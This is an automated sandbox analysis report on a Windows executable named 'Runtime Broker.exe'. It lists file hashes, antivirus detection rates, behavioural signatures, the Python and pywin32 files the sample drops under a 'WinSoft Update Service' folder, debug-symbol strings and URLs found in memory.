Play interactive tour

Edit tour

Windows Analysis Report Runtime Broker.exe

Overview

General Information

Sample Name:	Runtime Broker.exe
Analysis ID:	528970
MD5:	abc7a9c5b732b72a8f47fd85ee638c09
SHA1:	9876415085f95c02d6bcea9b1fc990d5b5c50d1c
SHA256:	d9ebb6958afcd1907651487062108ec56a2af9eb935f2437156584081cb56b2f
Infos:
Most interesting Screenshot:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Uses 32bit PE files

PE file does not import any functions

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to shutdown / reboot the system

PE file contains sections with non-standard names

Detected potential crypto function

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found dropped PE file which has not been started or loaded

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

Runtime Broker.exe (PID: 1848 cmdline: "C:\Users\user\Desktop\Runtime Broker.exe" MD5: ABC7A9C5B732B72A8F47FD85EE638C09)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Runtime Broker.exe	Virustotal: Detection: 36%			Perma Link
Source: Runtime Broker.exe	ReversingLabs: Detection: 33%

Machine Learning detection for sample

Show sources

Source: Runtime Broker.exe

Joe Sandbox ML: detected

Source: Runtime Broker.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\LICENSE.txt	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\license.txt	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\README.txt	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\samples\README.txt	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\test\README.txt	Jump to behavior

Source: Runtime Broker.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\A\18\s\PCbuild\win32\_asyncio.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_hashlib.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axscript.pdb1" source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\authorization.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: MFCM140U.i386.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\PyISAPI_loader.pdb source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_ssl.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axscript.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_lzma.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Heap-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: debugger_parent=pdb.Pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\win32ui.pdbP source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axdebug.pdbM! source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\directsound.pdb+ source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_decimal.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_elementtree.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_multiprocessing.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\pywintypes.pdb+ source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_decimal.pdb%% source: nsg2001.tmp.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: libcrypto-1_1.dll.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_tkinter.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\ifilter.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: API-MS-Win-Core-LibraryLoader-L1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr, nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Memory-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\PyISAPI_loader.pdb! source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\bits.pdb+ source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axdebug.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\directsound.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_ctypes.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axcontrol.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axcontrol.pdb3" source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\6\b\libssl-1_1.pdb source: libssl-1_1.dll.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_queue.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\win32uiole.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\internet.pdb/% source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\mapi.pdb9 source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\pythoncom.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: API-MS-Win-Core-Memory-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Heap-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\win32ui.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_msi.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_sqlite3.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_socket.pdb source: _socket.pyd.0.dr, nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-File-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\pythoncom.pdb},# source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: API-MS-Win-Core-File-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Console-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\mapi.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\adsi.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: API-MS-Win-Core-ErrorHandling-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr, nsg2001.tmp.0.dr
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1g 21 Apr 2020built on: Fri Jun 12 19:53:43 2020 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
Source:	Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Debug-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Interlocked-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_bz2.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\bits.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\adsi.pdb* source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_overlapped.pdb source: _overlapped.pyd.0.dr, nsg2001.tmp.0.dr
Source:	Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
Source:	Binary string: API-MS-Win-Core-LibraryLoader-L1-1-0.pdb3 source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr, nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\python37.pdb source: python37.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: C:\A\6\b\libssl-1_1.pdb@@ source: libssl-1_1.dll.0.dr
Source:	Binary string: API-MS-Win-Core-ErrorHandling-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\pywintypes.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_lzma.pdbOO source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\win32uiole.pdb,&" source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\internet.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: API-MS-Win-Core-Console-L1-1-0.pdb source: nsg2001.tmp.0.dr

Source: C:\Users\user\Desktop\Runtime Broker.exe	Code function: 0_2_0040689A FindFirstFileW,FindClose,	0_2_0040689A
Source: C:\Users\user\Desktop\Runtime Broker.exe	Code function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C4E
Source: C:\Users\user\Desktop\Runtime Broker.exe	Code function: 0_2_00402902 FindFirstFileW,	0_2_00402902

Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\_distutils_hack\	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\Lib	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\_distutils_hack	Jump to behavior

Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.0.1/Python/interrupt/test.asp
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.0.1/Python/interrupt/test1.asp
Source: tcl86t.dll.0.dr	String found in binary or memory: http://aia.startssl.com/certs/ca.crt0
Source: tcl86t.dll.0.dr	String found in binary or memory: http://aia.startssl.com/certs/sca.code3.crt06
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: http://badge.fury.io/py/idna
Source: contextlib2.py.0.dr	String found in binary or memory: http://bugs.python.org/issue12029
Source: contextlib2.py.0.dr	String found in binary or memory: http://bugs.python.org/issue13585
Source: contextlib2.py.0.dr	String found in binary or memory: http://bugs.python.org/issue19404
Source: libssl-1_1.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: libssl-1_1.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: compat.py1.0.dr	String found in binary or memory: http://code.activestate.com/recipes/576693/
Source: tcl86t.dll.0.dr	String found in binary or memory: http://crl.startssl.com/sca-code3.crl0#
Source: tcl86t.dll.0.dr	String found in binary or memory: http://crl.startssl.com/sfsca.crl0f
Source: libssl-1_1.dll.0.dr, tcl86t.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: libssl-1_1.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: libssl-1_1.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: libssl-1_1.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: libssl-1_1.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nsg2001.tmp.0.dr	String found in binary or memory: http://hdl.handle.net/1895.22/1013
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: http://iana.org/
Source: Runtime Broker.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: libssl-1_1.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: libssl-1_1.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: tcl86t.dll.0.dr	String found in binary or memory: http://ocsp.startssl.com00
Source: tcl86t.dll.0.dr	String found in binary or memory: http://ocsp.startssl.com07
Source: libssl-1_1.dll.0.dr, tcl86t.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://pages.cpsc.ucalgary.ca/~saul/vb_examples/tutorial12/
Source: python37.dll.0.dr	String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: __init__.py23.0.dr	String found in binary or memory: http://sourceforge.net/projects/adodbapi
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://starship.python.net/crew/mhammond/win32/PrivacyProblem.html
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc3490
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5891
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5895
Source: compat.py1.0.dr	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: libssl-1_1.dll.0.dr, tcl86t.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: libssl-1_1.dll.0.dr, tcl86t.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: libssl-1_1.dll.0.dr, tcl86t.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: http://unicode.org/reports/tr46/
Source: distro.py.0.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: nsg2001.tmp.0.dr	String found in binary or memory: http://www.cnri.reston.va.us)
Source: nsg2001.tmp.0.dr	String found in binary or memory: http://www.cwi.nl)
Source: distro.py.0.dr	String found in binary or memory: http://www.freedesktop.org/software/systemd/man/os-release.html
Source: chardistribution.py.0.dr, chardistribution.py0.0.dr	String found in binary or memory: http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html
Source: nsg2001.tmp.0.dr	String found in binary or memory: http://www.opensource.org
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://www.python.org
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://www.python.org/favicon.ico
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://www.python.org/missing-favicon.ico
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://www.pythoncom-test.com/bar
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://www.pythoncom-test.com/foo
Source: nsg2001.tmp.0.dr	String found in binary or memory: http://www.pythonlabs.com/logos.html
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://www.scintilla.org)
Source: tcl86t.dll.0.dr	String found in binary or memory: http://www.startssl.com/0P
Source: tcl86t.dll.0.dr	String found in binary or memory: http://www.startssl.com/policy0
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: https://badge.fury.io/py/idna.svg
Source: distro.py.0.dr	String found in binary or memory: https://bugs.python.org/issue1322
Source: logging.py.0.dr	String found in binary or memory: https://bugs.python.org/issue19612
Source: logging.py.0.dr	String found in binary or memory: https://bugs.python.org/issue30418
Source: pyparsing.py.0.dr	String found in binary or memory: https://docs.python.org/3/library/pprint.html
Source: pyparsing.py.0.dr	String found in binary or memory: https://docs.python.org/3/library/pprint.html#pprint.pprint
Source: pyparsing.py.0.dr	String found in binary or memory: https://docs.python.org/3/library/re.html
Source: pyparsing.py.0.dr	String found in binary or memory: https://docs.python.org/3/library/re.html#re.sub
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/kjd/idna
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/mhammond/pywin32
Source: distro.py.0.dr	String found in binary or memory: https://github.com/nir0s/distro/issues/162
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/psf/requests/issues/3578.
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/psf/requests/pull/2238
Source: spinners.py.0.dr	String found in binary or memory: https://github.com/pypa/pip/issues/3418
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/pypa/pip/issues/7498.
Source: install.py0.0.dr	String found in binary or memory: https://github.com/pypa/pip/issues/new
Source: prepare.py.0.dr	String found in binary or memory: https://github.com/pypa/pip/pull/6770
Source: pyparsing.py.0.dr	String found in binary or memory: https://github.com/pyparsing/pyparsing/wiki
Source: logging.py.0.dr	String found in binary or memory: https://github.com/python/mypy/issues/1297
Source: logging.py.0.dr	String found in binary or memory: https://github.com/python/mypy/issues/3500
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: https://httpbin.org/get
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: https://httpbin.org/post
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: pyparsing.py.0.dr	String found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: https://stackoverflow.com/questions/45138084/pythonwin-occasionally-gives-an-error-on-opening
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: https://travis-ci.org/kjd/idna
Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	String found in binary or memory: https://travis-ci.org/kjd/idna.svg?branch=master
Source: cacert.pem0.0.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: libssl-1_1.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.dr	String found in binary or memory: https://www.openssl.org/H
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: https://www.python.org
Source: cache.py2.0.dr	String found in binary or memory: https://www.python.org/dev/peps/pep-0427/
Source: Runtime Broker.exe, Runtime Broker.exe, 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0566/#id17.
Source: nsg2001.tmp.0.dr	String found in binary or memory: https://www.python.org/psf/)

Source: unknown

DNS traffic detected: queries for: google.com

Source: C:\Users\user\Desktop\Runtime Broker.exe

Code function: 0_2_004056E3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056E3

Source: Runtime Broker.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
